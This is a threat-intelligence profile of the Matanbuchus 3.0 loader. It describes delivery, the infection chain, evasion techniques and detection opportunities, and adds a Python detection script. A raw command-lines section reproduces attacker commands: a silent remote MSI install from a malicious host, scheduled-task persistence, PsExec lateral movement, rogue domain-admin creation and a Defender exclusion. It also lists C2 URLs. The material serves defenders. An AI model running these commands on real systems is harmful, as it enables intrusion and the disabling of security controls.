# Matanbuchus 3.0

- **Type:** Malware Loader / Malware-as-a-Service (MaaS)
- **Also tracked as:** BelialDemon (developer), Win32.Backdoor.Matanbuchus (detection name)
- **First observed:** February 2021 (v1 advertised by BelialDemon at $2,500/mo). Version 3.0 complete rewrite observed July 2025.
- **Status:** Active - premium-tier loader at $10K/mo (HTTPS) / $15K/mo (DNS variant). Returned from mid-2025 hiatus with the v3.0 rewrite. Active campaigns as of Feb 2026. The price point filters for funded RaaS affiliates, not commodity operators.

---

## Threat Overview

Matanbuchus is a C++ loader sold as MaaS by a developer known as BelialDemon (also behind TriumphLoader). Version 3.0 is a ground-up rewrite featuring Protobuf-serialized C2, ChaCha20 encryption, Heaven's Gate WoW64 bypass, and dual DLL sideloading chains. At $10-15K/month, this is 3-5x the cost of midmarket loaders - the price point means its customer base is smaller but better-funded (established RaaS affiliates, not commodity actors).

What makes Matanbuchus operationally distinct: it doesn't just drop a payload and die. It enumerates 70+ EDR products, reports findings to the operator, and the operator selects the execution method based on what's installed. The loader is the recon tool. This means the payload delivery is adaptive - same loader, different execution path depending on your stack. That's harder to write static detections for than a loader that always does the same thing.

Historically delivered Cobalt Strike, Rhadamanthys stealer, NetSupport RAT. Current campaigns deliver **AstarionRAT** (a 24-command RAT, undocumented until the Huntress disclosure in Feb 2026).
| Field | Value |
|---|---|
| Developer | BelialDemon (Russian-speaking forums) |
| Pricing | $10,000/mo (HTTPS), $15,000/mo (DNS) |
| Payload formats | EXE, DLL, MSI, shellcode, PowerShell, CMD, WMI |
| C2 protocol | Protobuf over HTTPS, ChaCha20 encrypted, 14 command types |
| Persistence | Scheduled task `Update Tracker Task` via `msiexec -z` |
| EDR awareness | Scans for 70+ EDR products, reports to C2 before payload selection |
| Anti-analysis | Heaven's Gate (32→64 bit), ChaCha20 brute-force decryption, MurmurHash3 API resolution, busy-loop sandbox evasion, hardcoded expiration date |
| Downstream payloads | AstarionRAT, Cobalt Strike, Rhadamanthys, NetSupport RAT, ransomware (unspecified) |

---

## Activity Standing

Mid-tier by volume, high-tier by sophistication. Matanbuchus went quiet mid-2025 then returned with a complete v3.0 rewrite advertised July 7, 2025. Active campaigns confirmed through Feb 2026.

Not a mass-distribution loader - the price point ($10-15K/mo) limits the customer base to operators who can afford it and expect ROI, which means RaaS affiliates with established access pipelines.

Two distinct delivery campaigns documented in 2025-2026:

1. **ClickFix social engineering** → silent MSI → dual sideloading → AstarionRAT (Huntress, Feb 2026)
2. **Microsoft Teams impersonation** → Quick Assist abuse → GUP.exe/Notepad++ sideloading (Morphisec, Jul 2025)

The Teams vector is notable - this is vishing (voice phishing via a Teams call), not email. If your security awareness training only covers email phishing, your users aren't prepared for this.

---

## Delivery Method

**Primary: ClickFix social engineering** - the user is lured to a page that instructs them to copy-paste a command into the Run dialog or a terminal. The command invokes `msiexec.exe` with a remote HTTP URL and the `/q` (silent) flag.
**Secondary: Microsoft Teams vishing** - the attacker calls via Teams impersonating the IT helpdesk, convinces the user to open Quick Assist, then instructs them to execute a script that downloads the loader MSI.

**Tertiary: Phishing email** - traditional attachment/link delivery (historical, less common in v3.0 campaigns).

All vectors converge on the same endpoint: a silently installed MSI package that drops the sideloading chain.

---

## Delivers To

| Payload | Type | Confidence |
|---|---|---|
| AstarionRAT | RAT (24 commands, SOCKS5, port scan, cred theft, reflective loading) | HIGH - observed in Huntress IR |
| Cobalt Strike | C2 framework | HIGH - historical campaigns |
| Rhadamanthys | Infostealer | HIGH - observed by Unit 42 |
| NetSupport RAT | Remote access tool | MEDIUM - older campaigns |
| Ransomware (unspecified) | RaaS payload | MEDIUM - Huntress assessed a ransomware trajectory based on operator behavior, disrupted before deployment |

---

## Infection Chain

### Step 1 - Social Engineering + Silent MSI

T1204.002, T1218.007 | Operator

The ClickFix lure tricks the user into executing `mSiexeC.EXe -PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q` - mixed casing evades case-sensitive string matching, the `../` path traversal collapses to the real package path, and `/q` runs silent.

The MSI drops: `aps.exe` (renamed 7-Zip), `core.exe` (Zillya! AVCore.exe), `SystemStatus.dll` (Matanbuchus), `INFO` (encrypted shellcode), runtime DLLs.

The Teams variant uses Quick Assist to install an MSI containing `HRUpdate.exe` + a sideloaded downloader DLL.

> **Detection Opportunity:** Monitor for `msiexec.exe` invocations with remote HTTP/HTTPS URLs combined with the `/q` (silent) flag. Legitimate remote silent MSI installs are rare in most enterprises - this is high-signal, low false-positive.

### Step 2 - DLL Sideloading Stage 1 (Zillya! AV)

T1574.002 | Malware

`core.exe` (legitimate Zillya! AVCore.exe) loads `SystemStatus.dll` (Matanbuchus 3.0) from `%APPDATA%`.
The AV binary is signed and trusted - sideloading through it bypasses application whitelisting and some EDR policies that trust signed AV vendor binaries.

> **Detection Opportunity:** Alert on known AV vendor binaries executing from user-writable paths (`%APPDATA%`, `%TEMP%`, `%ProgramData%`) rather than their standard installation directories. A signed AV binary in a temp folder is almost always a sideloading vehicle.

### Step 3 - ChaCha20 Brute-Force + Heaven's Gate

T1027, T1055 | Malware

Matanbuchus reads the `INFO` file (8,624 bytes) and brute-forces the ChaCha20 decryption starting at counter 99999999 (key = 8-byte ASCII counter + 24-byte hardcoded suffix, nonce = 12 bytes XOR'd with `0x5A`), validating each attempt against the 21-byte Heaven's Gate shellcode prologue. The shellcode transitions 32→64 bit via a far return to segment `0x33`, bypassing WoW64 EDR hooks. It then downloads the main module from `hxxps://marle[.]io/check/updprofile.aspx` - the response starts with the magic `0xDEADBEEF` and is decrypted in 8KB ChaCha20 chunks.

> **Detection Opportunity:** Heaven's Gate detection requires monitoring for cross-architecture transitions (a 32-bit process executing 64-bit code via a segment `0x33` far return). Kernel-level telemetry or ETW providers tracking WoW64 transitions are the best detection surface here. Userland hooks are explicitly bypassed by this technique.

### Step 4 - DLL Sideloading Stage 2 (Java)

T1574.002 | Malware

Drops to `%TEMP%\ndvyxgdriggmarrf\`: legitimate `java.exe`, malicious `jli.dll`, encrypted Lua script `SySUpd`. `java.exe` loads `jli.dll` (normally the Java Launch Interface), which here contains an embedded Lua 5.4.7 interpreter + a custom reflective PE loader. Final payload: AstarionRAT.

> **Detection Opportunity:** Monitor for `java.exe` or `javaw.exe` executing from `%TEMP%` or `%APPDATA%` paths, especially on systems with no JRE installed. A Java binary in a temp directory loading an unsigned DLL is a strong sideloading indicator.
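The command-line checks described in the Detection Opportunities for Steps 1, 2 and 4, plus the `msiexec -z` persistence check from Step 6 below, as an added Python example run over constructed Sysmon-style process-creation records; this is not code from the page or from any of the cited vendors. The record field names (`image`, `cmdline`), the set of user-writable roots, the benign control records and the `alice` user paths are assumptions; the flagged command lines, binaries and directory names are the ones the page reports.

```python
"""Process-creation triage for the Matanbuchus delivery chain (added example).

Runs a small rule set over Sysmon/EDR-style process-creation records and flags
a remote silent msiexec install (Step 1), a signed host binary or Java launcher
executing from a user-writable path (Steps 2 and 4), and msiexec invoked with
-z (Step 6). Field names and sample records are constructed for this example.
"""
import posixpath
import re
from urllib.parse import urlsplit

# Defanged forms (hxxp, [.]) are accepted so the page's IoCs can be fed in unchanged.
URL_RE = re.compile(r"(?i)\bh(?:xx|tt)ps?://[^\s\"']+")
SILENT_FLAGS = {"/q", "-q", "/qn", "-qn", "/quiet", "-quiet"}
# Assumption: these roots count as user-writable; matched on the lower-cased image path.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
# Signed host binaries the page names as sideloading vehicles.
SIDELOAD_HOSTS = {"core.exe", "avcore.exe", "java.exe", "javaw.exe", "gup.exe"}


def _tokens(cmdline):
    """Lower-cased, quote-stripped whitespace tokens (quoted paths with spaces
    are not reassembled; that is enough for flag and URL matching)."""
    return [t.strip('"').lower() for t in cmdline.split()]


def normalize_url(url):
    """Refang and collapse '..' segments so the real package path is visible."""
    url = re.sub(r"(?i)^hxxp", "http", url).replace("[.]", ".")
    parts = urlsplit(url)
    return parts._replace(path=posixpath.normpath(parts.path) or "/").geturl()


def msiexec_remote_silent(event):
    """Step 1: msiexec.exe fetching a package over HTTP(S) with a silent flag.
    Returns the normalized URL on a hit, else None."""
    if not event["image"].lower().endswith("\\msiexec.exe"):
        return None
    urls = URL_RE.findall(event["cmdline"])
    if urls and SILENT_FLAGS & set(_tokens(event["cmdline"])):
        return normalize_url(urls[0])
    return None


def sideload_host_in_user_writable(event):
    """Steps 2 and 4: a known signed host binary running from a user-writable path.
    Returns the binary name on a hit, else None."""
    image = event["image"].lower()
    name = image.rsplit("\\", 1)[-1]
    if name in SIDELOAD_HOSTS and any(root in image for root in USER_WRITABLE):
        return name
    return None


def msiexec_z(event):
    """Step 6: msiexec -z <dll> as the persistence callback. Returns the DLL argument."""
    if not event["image"].lower().endswith("\\msiexec.exe"):
        return None
    tokens = _tokens(event["cmdline"])
    for i, tok in enumerate(tokens):
        if tok in ("-z", "/z"):
            return tokens[i + 1] if i + 1 < len(tokens) else "<missing argument>"
    return None


RULES = (
    ("remote_silent_msi", msiexec_remote_silent),
    ("sideload_host_user_writable", sideload_host_in_user_writable),
    ("msiexec_z_persistence", msiexec_z),
)


def triage(events):
    """Return (rule, detail, image) for every record that fires a rule."""
    hits = []
    for ev in events:
        for rule, check in RULES:
            detail = check(ev)
            if detail:
                hits.append((rule, detail, ev["image"]))
    return hits


# Constructed sample records: the first four mirror command lines and paths the
# page reports (user name and DLL location assumed); the last two are benign
# controls that must stay quiet.
SAMPLE_EVENTS = [
    {"image": r"C:\WINDOWS\system32\mSiexeC.EXe",
     "cmdline": r'"C:\WINDOWS\system32\mSiexeC.EXe" -PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q'},
    {"image": r"C:\Users\alice\AppData\Roaming\core.exe",
     "cmdline": r'"C:\Users\alice\AppData\Roaming\core.exe"'},
    {"image": r"C:\Users\alice\AppData\Local\Temp\ndvyxgdriggmarrf\java.exe",
     "cmdline": r'"C:\Users\alice\AppData\Local\Temp\ndvyxgdriggmarrf\java.exe"'},
    {"image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r"C:\Windows\SysWOW64\msiexec.exe -z C:\Users\alice\AppData\Roaming\SystemStatus.dll"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\7z2409-x64.msi" /qn'},
    {"image": r"C:\Program Files\Java\jre-17\bin\java.exe",
     "cmdline": r'"C:\Program Files\Java\jre-17\bin\java.exe" -jar app.jar'},
]

if __name__ == "__main__":
    for rule, detail, image in triage(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}  <- {image}")
```

Every comparison runs on lower-cased tokens, so the mixed casing in the Step 1 command line gains nothing, and the URL normalizer collapses the `..` segments so the alert carries the real package path (`/466943`) rather than the decoy. The sideloading rule keys on where the signed host binary runs from, not on the DLL name, which is the TTP-level detection the summary below asks for: a local `msiexec /i ... /qn` and a `java.exe` under `Program Files` stay quiet.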
### Step 5 - C2 Registration + EDR Enumeration

T1071.001, T1518.001 | Malware

The main module registers with C2 via Protobuf-over-HTTPS (ChaCha20 encrypted, 32-byte key + 12-byte nonce prepended). It transmits: hostname, username, Windows version, domain, installed EDR products (checks for Defender, CrowdStrike, SentinelOne, Sophos, Trellix, Cortex XDR, Bitdefender), admin status, architecture, campaign/bot IDs. C2 traffic masquerades as the Skype Desktop application. The operator receives the EDR inventory and selects the execution method accordingly.

> **Detection Opportunity:** Matanbuchus performs EDR enumeration entirely in-process via a decrypted string table - not through command-line tools like `findstr` or `wmic`. Traditional command-line monitoring will not catch this. Detection depends on monitoring for process enumeration API calls or identifying the C2 callback pattern (Protobuf-over-HTTPS with a Skype Desktop user-agent from a non-Skype process).

### Step 6 - Persistence

T1053.005 | Malware

Creates scheduled task `Update Tracker Task` via: `%WINDIR%\SysWOW64\msiexec.exe -z %Matanbuchus_path%`. The directory name is derived from the volume serial number. Per-host mutex (prefix `sync`). A registry key at `HKCU\SOFTWARE\%volume_serial_ID%` tracks registration.

> **Detection Opportunity:** Monitor for scheduled task creation where the action invokes `msiexec.exe` with the `-z` flag. The `-z` flag is rarely used legitimately and serves here as the persistence callback mechanism. Also look for `msiexec.exe` executing with `-z` from `SysWOW64` as a standalone behavioral indicator.

### Step 7 - Payload Delivery (AstarionRAT)

T1105 | Malware

AstarionRAT is deployed via reflective PE loading from the Lua interpreter. 24 commands: shell exec, SOCKS5 proxy, port scanning, credential theft, reflective code loading, file operations. C2 uses RSA encryption disguised as application telemetry - hard to distinguish from legitimate HTTPS app traffic at the network layer.
> **Detection Opportunity:** AstarionRAT is newly documented with no widely available signatures. Behavioral detection is the primary surface: watch for SOCKS5 proxy establishment, reflective PE loading from scripting interpreters (Lua), and anomalous outbound connections from processes spawned by `java.exe` in temp directories.

### Step 8 - Lateral Movement (Operator)

T1021.002, T1570 | Operator

Next-day return. PsExec to Windows Server → DC1 → DC2 in ~40 minutes. Created rogue domain accounts. Staged Defender exclusions (`Set-MpPreference -ExclusionPath`). Installed under fake vendor names in `%APPDATA%`: `AegisLynx Cybernetics Ltd`, `DocuRay Technologies S.r.l`, `HelixShield Technologies ApS`. Staging directory: `C:\ProgramData\USOShared\` (mimics Windows Update).

> **Detection Opportunity:** Multiple high-signal behaviors in this phase: PsExec-based lateral movement to domain controllers, creation of new domain accounts via `net user /add /domain`, `Set-MpPreference -ExclusionPath` to tamper with Defender, and files written to `C:\ProgramData\USOShared\` by non-Windows Update processes. Each of these is individually detectable; in combination, they represent a clear hands-on-keyboard intrusion.
>
> See rule: [[edr-win-def-defender-tampering]]

---

## Raw Command Lines

**Initial access (ClickFix)**

```
"C:\WINDOWS\system32\mSiexeC.EXe" -PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q
```

**Persistence**

```
%WINDIR%\SysWOW64\msiexec.exe -z %Matanbuchus_path%
schtasks /create /tn "Update Tracker Task" /tr "msiexec.exe -z <path>" /sc onlogon
```

**C2 download (main module)**

```
hxxps://marle[.]io/check/updprofile.aspx
hxxps://mechiraz[.]com/cart/checkout/files/update_info.aspx
```

**EDR enumeration (in-process, not cmdline)**

```
Scans for: MsMpEng.exe, CSFalcon*, SentinelAgent*, SophosSAU*, xagt.exe, cortex*, bdservicehost*
```

**Lateral movement (operator hands-on-keyboard)**

```
psexec.exe \\<SERVER> -s cmd.exe /c <COMMAND>
net user <rogue_account> <password> /add /domain
net localgroup administrators <rogue_account> /add
Set-MpPreference -ExclusionPath "C:\ProgramData\USOShared\"
```

**Staging paths**

```
C:\ProgramData\USOShared\
%APPDATA%\AegisLynx Cybernetics Ltd\AegisLynx Threat Fabric\AVU\
%APPDATA%\DocuRay Technologies S.r.l\DocuRay PDF Professional\ZAVY\
%APPDATA%\HelixShield Technologies ApS\HelixShield Adaptive Security\APS\ZAV\
```

---

## Detection Opportunities Summary

The following behavioral indicators provide the highest-signal detection surfaces across this chain:

1. **Remote silent MSI install** - `msiexec.exe` with an HTTP/HTTPS URL in the command line + the `/q` silent flag. Rare in legitimate enterprise use.
2. **Signed binary sideloading from user-writable paths** - any signed executable (AV binaries, Java, Notepad++ updater) loading unsigned DLLs from `%APPDATA%`, `%TEMP%`, or `%ProgramData%`. This is a TTP-level detection that catches Matanbuchus and any future sideloading chain using legitimate binaries as vehicles.
3. **`msiexec.exe -z` execution** - the `-z` flag is rarely used legitimately and indicates DLL loading via msiexec, used here for persistence.
4. **Files in `C:\ProgramData\USOShared\`** written by non-Windows Update processes - attackers mimic the Windows Update staging directory.
5. **GUP.exe or Notepad++ updater binaries** executing outside the Notepad++ install directory - sideloading vehicle in the Teams/Quick Assist delivery variant.
6. **Cross-architecture transitions** (32→64 bit via segment `0x33`) - Heaven's Gate bypass of WoW64 hooks, detectable at kernel level.

---

## Intelligence Gaps

- **AstarionRAT C2 protocol underdocumented** - RSA-encrypted, disguised as app telemetry - but no pcap-level detail, beaconing intervals, or jitter config. Network detection may be near-zero if it blends with legitimate HTTPS.
- **Matanbuchus customer base unknown** - $10-15K/mo pricing implies a small but funded operator pool. Which RaaS programs overlap with Matanbuchus customers would narrow the predicted impact phase - that data sits in closed-source intel.
- **AstarionRAT prevalence** - Bespoke for one operator or being sold? If sold, expect rapid proliferation. No data either way.
- **DNS variant ($15K/mo) undocumented** - Stealthier than the HTTPS variant per the advertisement. No public technical analysis of the DNS-based C2 protocol.
- **Initial delivery vector for ClickFix lures unclear** - Email? Malvertising? SEO poisoning? Different vector = different prevention control.

---

## Confidence Assessment

| Claim | Confidence | Evidence | Flips if... |
|---|---|---|---|
| ClickFix → Matanbuchus → AstarionRAT is active ITW | HIGH | Huntress IR, direct forensic observation | Nothing - observed fact |
| Operator trajectory was ransomware | MEDIUM | DC targeting + Defender exclusions + rogue accounts | AstarionRAT is espionage-oriented (exfil-heavy, no encryption) |
| Heaven's Gate bypasses EDR userland hooks | MEDIUM | Technique documented; depends on EDR kernel coverage | EDR has kernel callbacks for cross-arch transitions |
| BelialDemon is sole developer | MEDIUM | Consistent forum persona since 2021, TriumphLoader lineage | Multiple developers behind same persona |
| $10-15K pricing filters for funded operators | HIGH | Price point 3-5x midmarket loaders | Discounts, trial access, or partnership deals we don't see |

---

## Detections

Sigma rules applicable to this threat:

| Rule ID | Description |
| ---------------------------------- | ----------------------------------------- |
| [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell |
| [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution |
| [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment |

---

## Key Publications

1. [Huntress - ClickFix → Matanbuchus → AstarionRAT Analysis](https://www.huntress.com/blog/clickfix-matanbuchus-astarionrat-analysis) (Feb 2026)
2. [Zscaler ThreatLabz - Technical Analysis of Matanbuchus 3.0](https://www.zscaler.com/blogs/security-research/technical-analysis-matanbuchus-3-0) (2025)
3. [Morphisec - Matanbuchus 3.0 MaaS Levels Up](https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up/) (Jul 2025)
4. [Unit 42 - Matanbuchus: Malware-as-a-Service with Demonic Intentions](https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/) (2022)
5. [CyberArk - Inside Matanbuchus: A Quirky Loader](https://www.cyberark.com/resources/threat-research-blog/inside-matanbuchus-a-quirky-loader) (2022)
6. [Cyble - Matanbuchus Loader Resurfaces](https://cyble.com/blog/matanbuchus-loader-resurfaces/) (2025)
7. [CYFIRMA - Matanbuchus Loader Report](https://www.cyfirma.com/research/matanbuchus-loader-report/) (2025)